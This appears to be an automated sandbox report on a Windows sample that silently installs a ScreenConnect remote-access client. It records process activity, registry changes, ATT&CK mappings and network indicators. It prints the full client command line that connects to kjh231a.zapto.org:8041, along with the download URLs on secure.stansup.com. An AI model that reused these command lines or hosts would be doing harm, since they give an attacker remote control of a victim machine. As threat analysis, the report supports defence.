                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q0b52qgm.675\bv2jh5rm.ncd\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q0b52qgm.675\bv2jh5rm.ncd\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q0b52qgm.675\bv2jh5rm.ncd\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61BD4 cpuid 0_2_00B61BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B61806
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.a30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2495260176.000001D4592FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 1556, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 4332, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 121 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Inhibit System Recovery
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Software Packing | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Search Order Hijacking | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Masquerading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 51 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Users | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Bootkit | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
[Behavior graph: ID 1542314, Sample: khwHsyfsJ1.exe, Startdate: 25/10/2024, Architecture: WINDOWS, Score: 66]

Source | Detection | Scanner | Label | Link
khwHsyfsJ1.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://www.w3.or | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
http://www.w3.o | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
secure.stansup.com | 79.110.49.185 | true | false | | unknown
kjh231a.zapto.org | 79.110.49.185 | true | false | | unknown
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.34 | true | false | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe | false | | unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe | false | | unknown
